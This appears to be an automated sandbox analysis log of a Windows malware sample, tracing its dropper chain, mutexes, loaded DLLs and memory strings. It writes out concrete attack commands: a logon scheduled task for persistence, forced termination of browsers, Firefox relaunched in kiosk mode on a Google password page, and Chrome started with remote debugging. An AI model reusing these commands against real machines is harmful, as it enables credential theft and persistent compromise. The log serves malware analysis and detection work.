Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: firefox.exe, 00000020.00000003.3346064434.000001D76F4AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 232a1df2aa.exe, 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 232a1df2aa.exe, 0000000E.00000003.2909553875.0000000005DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 232a1df2aa.exe, 0000000E.00000002.3232490759.0000000005ECD000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3242548667.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 47%

Source: H9TU4oY.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: c1ca3b12e5.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 232a1df2aa.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe "C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe "C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe"
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"'
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2244,i,13816105926383090107,12018060806231782477,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98e24b6f-d5ed-4478-94c0-894f34eff867} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d752e70310 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4304 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a40b55a-69a4-45fc-a0b1-a2c905871959} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d7650bff10 rdd
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe "C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"
Source: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe "C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe "C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe "C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe "C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe "C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe "C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe "C:\Users\user\AppData\Local\Temp\1015356001\eb9e6e120f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"' & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chromes" /tr '"C:\Users\user\AppData\Roaming\chromes.exe"'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2244,i,13816105926383090107,12018060806231782477,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98e24b6f-d5ed-4478-94c0-894f34eff867} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d752e70310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4304 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a40b55a-69a4-45fc-a0b1-a2c905871959} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1d7650bff10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe "C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe"
Source: C:\Users\user\AppData\Local\Temp\1015357001\ee19225489.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
